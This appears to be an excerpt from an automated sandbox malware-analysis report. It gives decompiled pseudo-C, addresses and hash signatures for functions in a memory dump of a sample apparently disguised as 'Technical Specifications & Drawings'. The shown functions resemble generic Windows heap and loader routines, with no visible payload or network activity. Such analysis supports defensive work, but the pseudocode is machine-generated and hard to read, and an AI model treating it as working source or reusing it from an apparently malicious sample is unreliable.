                                                  0x01870779
                                                  0x0187077d
                                                  0x01870789
                                                  0x01870795
                                                  0x018707a7
                                                  0x01870797
                                                  0x018707a0
                                                  0x018707a0
                                                  0x018707af
                                                  0x018707c4
                                                  0x018707cd
                                                  0x018707cd
                                                  0x018707af
                                                  0x018707dc

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                  • Instruction ID: 250ea9432e4c38f85d0bb2de27003d6223ca9ee5dd11f9b4c3caf65afc8abe66
                                                  • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                  • Instruction Fuzzy Hash: B22146362082049FD705DF1CC884B6ABBA5EFD1350F04852DF995DB385CB30DA09CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01827794 Relevance: .1, Instructions: 70COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 82%
                                                  			E01827794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x1897b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L017C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E017EF3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E017C7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E017E9AE0();
					_t24 = L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                                  0x01827799
                                                  0x0182779a
                                                  0x0182779b
                                                  0x018277a3
                                                  0x018277ab
                                                  0x018277ae
                                                  0x018277b1
                                                  0x018277b1
                                                  0x018277bf
                                                  0x018277c4
                                                  0x018277c8
                                                  0x018277ce
                                                  0x018277d4
                                                  0x018277e0
                                                  0x018277e0
                                                  0x018277d6
                                                  0x018277d6
                                                  0x018277de
                                                  0x00000000
                                                  0x00000000
                                                  0x018277de
                                                  0x018277e5
                                                  0x018277f0
                                                  0x018277f3
                                                  0x018277f6
                                                  0x018277fd
                                                  0x01827800
                                                  0x0182780c
                                                  0x01827818
                                                  0x0182782b
                                                  0x0182781a
                                                  0x01827823
                                                  0x01827823
                                                  0x01827830
                                                  0x01827831
                                                  0x01827838
                                                  0x0182783d
                                                  0x0182783e
                                                  0x0182784f
                                                  0x0182784f
                                                  0x0182785a

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1dcc3be420c957d6955c46a250a74d8d827201e14334d58b9f7c3df8ca90d5cf
                                                  • Instruction ID: 71fdfcbd3a86502edf7a19bf8dbf8271fd56f62bdf3981a521d327bbe82a2b48
                                                  • Opcode Fuzzy Hash: 1dcc3be420c957d6955c46a250a74d8d827201e14334d58b9f7c3df8ca90d5cf
                                                  • Instruction Fuzzy Hash: D821DE72900614AFC726DF69D884E6BBBF8EF58740F10016DFA0AD7750D634EA40CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017CAE73 Relevance: .1, Instructions: 70COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 96%
                                                  			E017CAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E017C7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E017C7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E017C7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E017C7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E01827794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                                  0x017cae78
                                                  0x017cae7c
                                                  0x017cae7e
                                                  0x017cae81
                                                  0x017cae86
                                                  0x017cae8d
                                                  0x01812691
                                                  0x017cae93
                                                  0x017cae93
                                                  0x017cae93
                                                  0x017cae98
                                                  0x017cae9d
                                                  0x018126a2
                                                  0x018126b4
                                                  0x018126a4
                                                  0x018126ad
                                                  0x018126ad
                                                  0x018126b9
                                                  0x00000000
                                                  0x018126bb
                                                  0x00000000
                                                  0x018126bb
                                                  0x017caea3
                                                  0x017caea3
                                                  0x017caea3
                                                  0x017caeaa
                                                  0x018126c0
                                                  0x018126c9
                                                  0x018126c9
                                                  0x017caeb3
                                                  0x018126d4
                                                  0x018126e1
                                                  0x00000000
                                                  0x00000000
                                                  0x018126e7
                                                  0x018126ee
                                                  0x018126f0
                                                  0x018126f9
                                                  0x018126f9
                                                  0x01812702
                                                  0x01812708
                                                  0x01812708
                                                  0x0181270b
                                                  0x0181270f
                                                  0x01812711
                                                  0x01812711
                                                  0x01812725
                                                  0x01812725
                                                  0x00000000
                                                  0x017caeb9
                                                  0x017caeb9
                                                  0x017caebf
                                                  0x017caebf
                                                  0x017caeb3

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                  • Instruction ID: 34c5e06aa9359a9f868d5963b5b18eef5b5667b2efe8394fe197852a7e5e395d
                                                  • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                  • Instruction Fuzzy Hash: A72104726016858FE7169B6CC948B25BBE9EF04B40F2904E8DD04CB296E734DD40CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017DFD9B Relevance: .1, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 93%
                                                  			E017DFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E017B76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L017C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                  0x017dfd9b
                                                  0x017dfda0
                                                  0x017dfda1
                                                  0x017dfdab
                                                  0x017dfdad
                                                  0x017dfdb0
                                                  0x017dfdb8
                                                  0x017dfe0f
                                                  0x017dfde6
                                                  0x017dfde9
                                                  0x017dfdec
                                                  0x0181c0c0
                                                  0x017dfdfe
                                                  0x017dfe06
                                                  0x017dfe06
                                                  0x0181c0c8
                                                  0x017dfe2d
                                                  0x017dfe2d
                                                  0x00000000
                                                  0x017dfe2d
                                                  0x0181c0d1
                                                  0x0181c0e0
                                                  0x0181c0e5
                                                  0x0181c0e5
                                                  0x0181c0e8
                                                  0x00000000
                                                  0x0181c0e8
                                                  0x017dfdf4
                                                  0x00000000
                                                  0x00000000
                                                  0x017dfdf6
                                                  0x017dfdfa
                                                  0x017dfe1a
                                                  0x017dfe1f
                                                  0x017dfe1f
                                                  0x017dfdfc
                                                  0x00000000
                                                  0x017dfdfc
                                                  0x017dfdcc
                                                  0x017dfdd0
                                                  0x017dfe26
                                                  0x00000000
                                                  0x017dfe26
                                                  0x017dfdd8
                                                  0x017dfddb
                                                  0x017dfddd
                                                  0x017dfde0
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                  • Instruction ID: 9affe2f3c88bbd89d7f7896ed08eb9fe7ffbe0eb7aca65d8b29041588e4f9552
                                                  • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                  • Instruction Fuzzy Hash: 3F217972640A89DFD735CF0DC540E66FBF5EB98B10F2481AEE94A87619D730AD42CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017DB390 Relevance: .1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 54%
                                                  			E017DB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E017C2280(_t12, 0x1898608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E017E00C2(0x1898608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                  0x017db395
                                                  0x017db3a2
                                                  0x017db3a5
                                                  0x017db3aa
                                                  0x017db3b2
                                                  0x017db3ba
                                                  0x017db3bd
                                                  0x017db3c0
                                                  0x017db3c4
                                                  0x017db3c9
                                                  0x0181a3e9
                                                  0x0181a3ed
                                                  0x0181a3f0
                                                  0x0181a3ff
                                                  0x0181a403
                                                  0x0181a409
                                                  0x00000000
                                                  0x00000000
                                                  0x0181a40b
                                                  0x0181a40b
                                                  0x0181a40f
                                                  0x0181a415
                                                  0x0181a423
                                                  0x0181a423
                                                  0x0181a415
                                                  0x017db3d1
                                                  0x017db3e8
                                                  0x017db3e8
                                                  0x017db3d9

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a781b35d91a89bd54189aabe8a249bcd2837f86004eb43709ae30366ed0fceed
                                                  • Instruction ID: 7cac9358d5b767e33a255a5ea1fe4be479a4257301aef5785ecb2a4a24482433
                                                  • Opcode Fuzzy Hash: a781b35d91a89bd54189aabe8a249bcd2837f86004eb43709ae30366ed0fceed
                                                  • Instruction Fuzzy Hash: EA116B337061199BCB1E8E19CD85A6BB2ABEBC7730B29012DDE16CB380CD319D02C6D0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017A9240 Relevance: .1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 77%
                                                  			E017A9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x187f708);
				E017FD08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E017E95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E017E95D0();
				_t33 =  *0x18984c4; // 0x0
				L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x18984c4; // 0x0
				L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x18984c4; // 0x0
				E017C2280(L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x18986b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E017E95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E017E95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E017A9325();
					_t50 =  *0x18984c4; // 0x0
					return E017FD0D1(L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                  0x017a9240
                                                  0x017a9242
                                                  0x017a9247
                                                  0x017a924c
                                                  0x017a924e
                                                  0x017a9255
                                                  0x017a9257
                                                  0x017a925a
                                                  0x017a925f
                                                  0x017a925f
                                                  0x017a9266
                                                  0x017a9271
                                                  0x017a9276
                                                  0x017a9279
                                                  0x017a927e
                                                  0x017a9295
                                                  0x017a929a
                                                  0x017a92b1
                                                  0x017a92b6
                                                  0x017a92d7
                                                  0x017a92dc
                                                  0x017a92e0
                                                  0x017a92e6
                                                  0x017a92e8
                                                  0x017a92ee
                                                  0x017a9332
                                                  0x017a9333
                                                  0x017a9337
                                                  0x017a9338
                                                  0x017a933a
                                                  0x017a933a
                                                  0x017a933d
                                                  0x017a9342
                                                  0x017a9342
                                                  0x017a9345
                                                  0x017a9349
                                                  0x017a934e
                                                  0x017a9352
                                                  0x017a9357
                                                  0x017a92f4
                                                  0x017a92f4
                                                  0x017a92f6
                                                  0x017a92f9
                                                  0x017a9300
                                                  0x017a9306
                                                  0x017a9324
                                                  0x017a9324

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: fa31f9dff591a8cb699f8b1632c8c159166def6e05f074cae529c957d02f1c6e
                                                  • Instruction ID: e5eee9049c00a14a84eb8e0441f688293e474d95fbf3f273df58cf33b047c2da
                                                  • Opcode Fuzzy Hash: fa31f9dff591a8cb699f8b1632c8c159166def6e05f074cae529c957d02f1c6e
                                                  • Instruction Fuzzy Hash: 71214A72041602DFC726EF68CA48F5AF7F9FF19708F14456CA209866A6CB34E951CF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01834257 Relevance: .1, Instructions: 60COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 90%
                                                  			E01834257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x18808d0);
				E017FD08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E018341E8(__ebx, __edi, __ecx, _t39);
				E017BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x18987e4;
					_t18 =  *0x18987e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x1895cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x18987e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x18987e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L017A7055(_t31 + 0xfffffff8);
								_t24 =  *0x18987e0; // 0x0
								_t18 = _t24 - 1;
								 *0x18987e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x1895cd0;
				if( *0x1895cd0 <= 0) {
					L017A7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x18987e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x18987e8 = _t30;
						 *0x18987e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E017FD0D1(L01834320());
			}















                                                  0x01834257
                                                  0x01834257
                                                  0x01834257
                                                  0x01834259
                                                  0x0183425e
                                                  0x01834263
                                                  0x01834265
                                                  0x01834273
                                                  0x01834278
                                                  0x0183427c
                                                  0x0183427f
                                                  0x01834281
                                                  0x01834287
                                                  0x018342d7
                                                  0x018342d7
                                                  0x018342da
                                                  0x0183428d
                                                  0x0183428d
                                                  0x0183428f
                                                  0x01834292
                                                  0x01834297
                                                  0x0183429c
                                                  0x018342a0
                                                  0x018342a6
                                                  0x018342a8
                                                  0x018342ae
                                                  0x018342b3
                                                  0x00000000
                                                  0x018342ba
                                                  0x018342ba
                                                  0x018342bf
                                                  0x018342c5
                                                  0x018342ca
                                                  0x018342cf
                                                  0x018342d0
                                                  0x00000000
                                                  0x018342d0
                                                  0x018342b3
                                                  0x00000000
                                                  0x018342a6
                                                  0x0183429c
                                                  0x018342dc
                                                  0x018342dc
                                                  0x018342e3
                                                  0x01834309
                                                  0x018342e5
                                                  0x018342e5
                                                  0x018342e8
                                                  0x018342ee
                                                  0x018342f0
                                                  0x00000000
                                                  0x018342f2
                                                  0x018342f2
                                                  0x018342f4
                                                  0x018342f7
                                                  0x018342f9
                                                  0x01834300
                                                  0x01834300
                                                  0x018342f0
                                                  0x0183430e
                                                  0x0183431f

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 41e83893bbe3fbb9baf89a7e4059ddd178ad02ec10e45b6afd7a83b81786aa40
                                                  • Instruction ID: b6fbbc933ba44b42dd203fab3a509ff5c20ed84e2ab3cc33386aea24c3aa2702
                                                  • Opcode Fuzzy Hash: 41e83893bbe3fbb9baf89a7e4059ddd178ad02ec10e45b6afd7a83b81786aa40
                                                  • Instruction Fuzzy Hash: DC216D70501A06DFC725DF68D040A58BBF1FB87314B5C826EC119DB26ADB72D691CF81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017D2397 Relevance: .1, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 34%
                                                  			E017D2397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x189848c != 0) {
					L017CFAD0(0x1898610);
					if( *0x189848c == 0) {
						E017CFA00(0x1898610, _t19, _t27, 0x1898610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E017D2581(0x1898610, 0x17850a0, _t26, _t27, _t28);
						E017CFA00(0x1898610, 0x17850a0, _t27, 0x1898610);
					}
				} else {
					L1:
					_t11 =  *0x1898614; // 0x0
					if(_t11 == 0) {
						_t11 = E017E4886(0x1781088, 1, 0x1898614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E017D2581(0x1898610, (_t11 << 4) + 0x1785070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                                  0x017d23b0
                                                  0x017d23b6
                                                  0x017d2409
                                                  0x017d2415
                                                  0x01815ae9
                                                  0x00000000
                                                  0x017d241b
                                                  0x017d241b
                                                  0x017d241d
                                                  0x017d2427
                                                  0x017d242e
                                                  0x017d2430
                                                  0x017d2430
                                                  0x017d23b8
                                                  0x017d23b8
                                                  0x017d23b8
                                                  0x017d23bf
                                                  0x017d23fc
                                                  0x017d23fc
                                                  0x017d23c1
                                                  0x017d23c3
                                                  0x017d23d0
                                                  0x017d23d8
                                                  0x017d23d8
                                                  0x017d23dc
                                                  0x017d23de
                                                  0x017d23e1
                                                  0x017d23e1
                                                  0x017d23ec

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5b119ae6921a68fbd6e41defdd9b448e4e57d58f125435561346c2b36d589d60
                                                  • Instruction ID: 79c51caec5c185fbc035f8acb14ece46ca7ce071de6b2e9df9acc535d206175a
                                                  • Opcode Fuzzy Hash: 5b119ae6921a68fbd6e41defdd9b448e4e57d58f125435561346c2b36d589d60
                                                  • Instruction Fuzzy Hash: 48112B3274430A67E731A63EDC88F19F6E9FBA2710F18406EF603DB256C970D9028794
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018246A7 Relevance: .1, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 93%
                                                  			E018246A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
